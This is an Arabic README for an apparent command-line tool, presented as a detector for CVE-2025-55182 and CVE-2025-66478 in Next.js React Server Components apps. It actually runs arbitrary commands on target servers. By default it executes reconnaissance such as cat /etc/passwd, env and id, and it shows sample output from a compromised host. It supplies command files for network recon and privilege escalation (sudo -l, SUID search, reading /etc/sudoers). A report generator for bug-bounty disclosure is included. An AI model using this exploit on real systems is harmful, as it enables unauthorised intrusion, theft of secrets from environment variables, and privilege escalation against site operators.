
أداة سطر أوامر للكشف عن CVE-2025-55182 وCVE-2025-66478 في تطبيقات Next.js التي تستخدم React Server Components.
أداة سطر أوامر لكشف CVE-2025-55182 وCVE-2025-66478 في تطبيقات Next.js التي تستخدم React Server Components.
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
CVE-2025-55182 -d https://example.com
ملاحظة: إذا لم يتم توفير خيارات أوامر، يتم تنفيذ الأوامر الافتراضية.
تنفذ الأداة هذه الأوامر افتراضيًا:
cat /etc/os-release - معلومات نظام التشغيلwhoami - المستخدم الحاليpwd - دليل العمل الحاليid - معرف المستخدم والمجموعاتuname -a - معلومات النظامhostname -I - واجهات الشبكةls -la - قائمة محتويات الدليلcat /etc/passwd - حسابات المستخدمينenv - متغيرات البيئةps aux - العمليات الجاريةأداة reportgenerator تنشئ تلقائيًا تقارير احترافية للإفصاح عن الثغرات من نتائج الفحص.
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt
# Run report generator
reportgenerator
| العلامة | الوصف | الافتراضي |
|---|---|---|
--file | ملف الإدخال الذي يحتوي على النطاقات المستهدفة | subs.txt |
--user | اسم الباحث لقسم الإفصاح | Bhagirath Saxena |
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator
# Use custom target file
reportgenerator --file targets.txt
# Use custom researcher name
reportgenerator --user "John Doe"
# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"
يتم إنشاء التقارير في دليلين:
textfile/ - مخرجات الفحص الخام (مرقمة: 1.txt، 2.txt، إلخ.)mdfile/ - تقارير markdown احترافية (مرقمة: 1.md، 2.md، إلخ.)ملاحظة: تضمن ميزة الترقيم التلقائي عدم استبدال التقارير الموجودة أبدًا. تستمر عمليات الفحص الجديدة من أعلى رقم موجود.
يتضمن كل تقرير يتم إنشاؤه:
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...
[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝
[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
commands/:أنشئ ملفات أوامر نموذجية لسيناريوهات مختلفة:
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
| الخيار | الوصف | الافتراضي |
|---|
-d, --domain | عنوان الهدف (يضيف https:// تلقائيًا في حال عدم وجود بروتوكول) | http://localhost:3000 |
-c, --command | أمر واحد للتنفيذ | - |
-m, --multiple | أوامر متعددة مفصولة بفواصل منقوطة | - |
-f, --file | ملف يحتوي على أوامر (أمر واحد في كل سطر) | - |
-h, --help | إظهار رسالة المساعدة | - |